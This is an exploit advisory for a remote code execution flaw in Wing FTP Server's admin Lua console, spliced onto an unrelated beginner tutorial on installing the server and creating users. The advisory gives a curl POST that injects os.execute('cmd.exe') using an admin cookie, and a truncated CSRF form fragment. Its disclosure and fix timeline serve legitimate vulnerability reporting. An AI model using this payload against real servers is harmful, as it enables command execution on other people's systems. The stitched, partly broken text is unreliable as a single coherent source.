Exploit Title: Wing FTP Server Remote Code Execution vulnerability
Vulnerable Versions: 4.4.6 and all previous versions
Vulnerability Type: Improper Control of Generation of Code

"Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. And it provides admins with a web based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server."

The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability. The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. The attack leverages the LUA CLI to inject commands at the same privilege as the web server.

:5466/admin_lua_script.html" method="POST" enctype="text/plain">

1) Either utilising the LUA Console interface directly and using the os.execute('') method.

2) POST directly using CURL with an authenticated cookie:

curl -i -s -k -X 'POST' -b 'admin_lang=english UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' --data-binary $'command=os.execute(\'cmd.exe\')'

Any OS command can be inserted into the os.execute('') method.

Vendor responds with requests for details of vulnerabilities. Vendor requests clarification on impact and various attack scenarios. Vulnerability confirmed and new version 4.4.7 released. Requests a week delay before public disclosure.

CSRF attack vector fixed in version 4.4.7. No fix for authenticated RCE at this time.

If you want to store some files on a computer (a so-called server) to let others download them from other computers, you need software called Wing FTP Server. Wing FTP Server not only allows you to share files with others, but also allows others to upload their files to the computer where Wing FTP Server is installed. Suppose you create a directory D:\wftpserver\ on your computer that is to be managed by Wing FTP Server. You want to store your to-be-shared files in D:\wftpserver\public\ so that they can be downloaded by others, and you create D:\wftpserver\user1\, D:\wftpserver\user2\, ..., to be used by Wing FTP Server users user1, user2, ..., to upload and store their own files. How can you achieve that with Wing FTP Server?

1. Download Wing FTP Server (we use the Windows version here; you can find Linux and Solaris versions on that website too).

2. Click WingFtpServer.exe to install Wing FTP Server on your computer. During installation, you will be asked to set up an administrator account, which is used to log in to the administration program that manages Wing FTP Server. Input an Administrator Username and a password here.

Wing FTP Server installation - add administrator account

3. After installation, launch the Wing FTP Server Administrator program (Figure). Input the username and password you created in step 2 to log in.

4. Input the domain name (domain1) and click "ok"; you will be prompted to create a user account. Click "ok" and input the user name (user1) and password (user1). Click "Browse" to choose the directory D:\wftpserver\user1\ on your computer as the user's (user1's) home directory (Physical Path). The Virtual Folder is shown as "/", which is the directory a user sees in his FTP client software right after he connects to the FTP server. When user1 connects to the FTP server (from another computer, via FTP client software), he will see the files in his home directory in his FTP client program, and he can operate on the files (delete, move, copy, download, etc.) via the FTP client.